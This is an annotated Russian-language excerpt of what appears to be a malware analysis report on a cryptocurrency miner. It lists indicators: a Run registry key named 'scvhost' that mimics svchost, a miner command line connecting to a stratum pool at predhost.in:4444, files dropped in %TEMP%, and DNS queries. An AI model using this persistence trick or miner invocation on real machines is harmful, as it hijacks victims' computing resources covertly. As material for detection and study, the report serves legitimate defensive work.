Техническая информация
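- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] 'scvhost' = '"%TEMP%\cp32\run.exe"' (ключ автозапуска: программа стартует при входе пользователя в систему; имя параметра 'scvhost' имитирует системное имя svchost с перестановкой букв)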
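- '%TEMP%\cp32\svchost.exe' -o stratum+tcp://predhost.in:4444 -u brien.1 -p x (параметры в формате, характерном для программ-майнеров: -o — адрес пула по протоколу Stratum, -u — учётная запись, -p — пароль; файл svchost.exe в %TEMP% не является системным — штатный svchost.exe находится в %WINDIR%\System32)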
- '%TEMP%\cp32\run.exe'
- '%WINDIR%\explorer.exe'
- %WINDIR%\explorer.exe
- %TEMP%\cp32\svchost.exe
- %TEMP%\cp32\zlib1.dll
- %TEMP%\nsq2.tmp\SelfDel.dll
- %TEMP%\cp32\run.exe
- %TEMP%\nsq2.tmp\System.dll
- %TEMP%\cp32\libcurl.dll
- %TEMP%\cp32\pthreadGC2.dll
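- %TEMP%\nsq2.tmp\System.dll
- %TEMP%\nsq2.tmp\SelfDel.dll (эти два файла уже перечислены выше; заголовки разделов в данной выдержке не сохранились — вероятно, временные файлы сначала создаются, а затем удаляются)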
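- 'pr##host.in':4444 (имя узла частично замаскировано; порт 4444 совпадает с портом пула в командной строке выше)
- DNS ASK pr##host.in (DNS-запрос на разрешение этого же имени)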